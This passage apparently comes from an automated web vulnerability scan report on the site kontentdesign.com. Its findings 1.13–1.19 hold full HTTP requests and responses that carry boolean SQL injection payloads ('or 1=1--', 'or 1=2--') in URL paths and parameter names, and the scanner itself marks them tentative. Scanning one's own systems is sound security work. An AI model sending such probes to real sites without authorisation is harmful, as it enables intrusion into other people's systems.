Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 563

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js/caption.js16186106' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js/caption.js16186106'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 559

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /media/system/js/caption.js16186106' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.13. http://kontentdesign.com/media/system/js/caption.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /media/system/js/caption.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15832840%20or%201%3d1--%20 and 15832840%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media/system/js/caption.js?115832840%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:08:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 544

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /media/system/js/caption.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /media/system/js/caption.js?115832840%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:54 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Sat, 24 Apr 2010 05:05:40 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:08:54 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 1963

/**
* @version        $Id: caption.js 5263 2006-10-02 01:25:24Z webImagery $
* @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
* @license        GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/

/**
* JCaption javascript behavior
*
* Used for displaying image captions
*
* @package    Joomla
* @since    1.5
* @version    1.0
*/
var JCaption = new Class({
   initialize: function(selector)
   {
       this.selector = selector;

       var images = $$(selector);
       images.each(function(image){ this.createCaption(image); }, this);
   },

   createCaption: function(element)
   {
       var caption = document.createTextNode(element.title);
       var container = document.createElement("div");
       var text = document.createElement("p");
       var width = element.getAttribute("width");
       var align = element.getAttribute("align");

       if(!width) {
           width = element.width;
       }

       //Windows fix
       if (!align)
           align = element.getStyle("float"); // Rest of the world fix
       if (!align) // IE DOM Fix
           align = element.style.styleFloat;

       if (align=="") {
           align="none";
       }

       text.appendChild(caption);
       text.className = this.selector.replace('.', '_');

       element.parentNode.insertBefore(container, element);
       container.appendChild(element);
       if ( element.title != "" ) {
           container.a
...[SNIP]...

1.14. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17976969'%20or%201%3d1--%20 and 17976969'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules17976969'%20or%201%3d1--%20/mod_fpss/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules17976969' or 1=1-- /mod_fpss/includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules17976969'%20or%201%3d2--%20/mod_fpss/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules17976969' or 1=2-- /mod_fpss/includes/engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.15. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 20625992'%20or%201%3d1--%20 and 20625992'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss20625992'%20or%201%3d1--%20/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:04:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss20625992' or 1=1-- /includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss20625992'%20or%201%3d2--%20/includes/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss20625992' or 1=2-- /includes/engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.16. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13584805'%20or%201%3d1--%20 and 13584805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes13584805'%20or%201%3d1--%20/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes13584805' or 1=1-- /engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes13584805'%20or%201%3d2--%20/engines/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:06:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes13584805' or 1=2-- /engines/jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.17. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 88843927'%20or%201%3d1--%20 and 88843927'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines88843927'%20or%201%3d1--%20/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines88843927' or 1=1-- /jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines88843927'%20or%201%3d2--%20/jquery-fpss-comp.js HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes/engines88843927' or 1=2-- /jquery-fpss-comp.js was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.18. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payloads 79937187'%20or%201%3d1--%20 and 79937187'%20or%201%3d2--%20 were each submitted in the REST URL parameter 5. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:08:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 590

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:08:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 586

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /modules/mod_fpss/includes/engines/jquery-fpss-comp.js79937187' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.19. http://kontentdesign.com/modules/mod_fpss/includes/engines/jquery-fpss-comp.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://kontentdesign.com
Path:   /modules/mod_fpss/includes/engines/jquery-fpss-comp.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11806235%20or%201%3d1--%20 and 11806235%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js?111806235%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /modules/mod_fpss/includes/engines/jquery-fpss-comp.js
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /modules/mod_fpss/includes/engines/jquery-fpss-comp.js?111806235%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
